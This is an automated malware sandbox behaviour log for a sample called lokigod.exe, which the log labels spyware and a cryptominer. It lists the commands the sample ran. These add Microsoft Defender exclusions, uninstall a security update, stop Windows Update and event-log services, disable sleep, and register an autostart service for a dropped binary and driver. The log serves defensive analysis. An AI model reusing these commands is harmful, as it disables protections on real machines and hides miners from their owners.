Source: classification engine | Classification label: mal100.spyw.evad.mine.winEXE@88/12@2/1
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7392:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7472:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5540:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6512:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7924:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7732:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7636:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7376:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7780:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7348:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:6500:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7956:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8020:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8184:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7532:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7628:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8004:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7876:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7368:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:6504:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8124:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7060:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7476:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7828:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:2072:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7940:120:WilError_03
Source: C:\Windows\System32\svchost.exe Mutant created: \BaseNamedObjects\Global\qtltrbgpvurodlwl
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_saebe5py.3p3.ps1
Source: lokigod.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Users\user\Desktop\lokigod.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: lokigod.exe ReversingLabs: Detection: 76%
Source: C:\Users\user\Desktop\lokigod.exe File read: C:\Users\user\Desktop\lokigod.exe
Source: unknown Process created: C:\Users\user\Desktop\lokigod.exe "C:\Users\user\Desktop\lokigod.exe"
Source: C:\Users\user\Desktop\lokigod.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\lokigod.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\Desktop\lokigod.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\Desktop\lokigod.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\lokigod.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\lokigod.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\lokigod.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\lokigod.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\Desktop\lokigod.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\powercfg.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\lokigod.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Windows\System32\powercfg.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\lokigod.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Source: C:\Windows\System32\powercfg.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\lokigod.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "LBFXRZGB"
Source: C:\Windows\System32\powercfg.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\lokigod.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "LBFXRZGB" binpath= "C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exe" start= "auto"
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\lokigod.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
Source: C:\Users\user\Desktop\lokigod.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "LBFXRZGB"
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exe C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exe
Source: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\powercfg.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Windows\System32\powercfg.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Source: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe
Source: C:\Windows\System32\powercfg.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\powercfg.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exe Process created: C:\Windows\System32\svchost.exe svchost.exe
Source: C:\Users\user\Desktop\lokigod.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
          Source: C:\Windows\System32\wusa.exe | Section loaded: dpx.dll
          Source: C:\Windows\System32\wusa.exe | Section loaded: wtsapi32.dll
          Source: C:\Windows\System32\wusa.exe | Section loaded: cryptsp.dll
          Source: C:\Windows\System32\wusa.exe | Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\wusa.exe | Section loaded: uxtheme.dll
          Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exe | Section loaded: umpdc.dll
          Source: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exe | Section loaded: apphelp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
          Source: C:\Windows\System32\wusa.exe | Section loaded: dpx.dll
          Source: C:\Windows\System32\wusa.exe | Section loaded: wtsapi32.dll
          Source: C:\Windows\System32\wusa.exe | Section loaded: cryptsp.dll
          Source: C:\Windows\System32\wusa.exe | Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exe | Section loaded: umpdc.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: iphlpapi.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: userenv.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: cryptbase.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: cryptsp.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: rsaenh.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: sspicli.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: powrprof.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: umpdc.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: mswsock.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc6.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: dnsapi.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: napinsp.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: pnrpnsp.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: wshbth.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: nlaapi.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: winrnr.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: rasadhlp.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: amsi.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: fwpuclnt.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
          Source: lokigod.exe | Static PE information: Image base 0x140000000 > 0x60000000
          Source: lokigod.exe | Static file information: File size 5265920 > 1048576
          Source: lokigod.exe | Static PE information: Raw size of .data is bigger than: 0x100000 < 0x4f5e00
          Source: lokigod.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: vzppfnnlsyit.exe, 00000022.00000003.2161528296.000001CEAE950000.00000004.00000001.00020000.00000000.sdmp
          Source: lokigod.exe | Static PE information: section name: .00cfg
          Source: vzppfnnlsyit.exe.0.dr | Static PE information: section name: .00cfg
          Source: C:\Windows\System32\conhost.exe | Code function: 56_2_0000000140001394 push qword ptr [0000000140009004h]; ret 56_2_0000000140001403

          Persistence and Installation Behavior

          Source: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exe | File created: C:\Windows\TEMP\gdtmkvyhysuy.sys
          Source: C:\Users\user\Desktop\lokigod.exe | File created: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exe
          Source: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exe | File created: C:\Windows\Temp\gdtmkvyhysuy.sys
          Source: C:\Users\user\Desktop\lokigod.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc

          Hooking and other Techniques for Hiding and Protection

          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
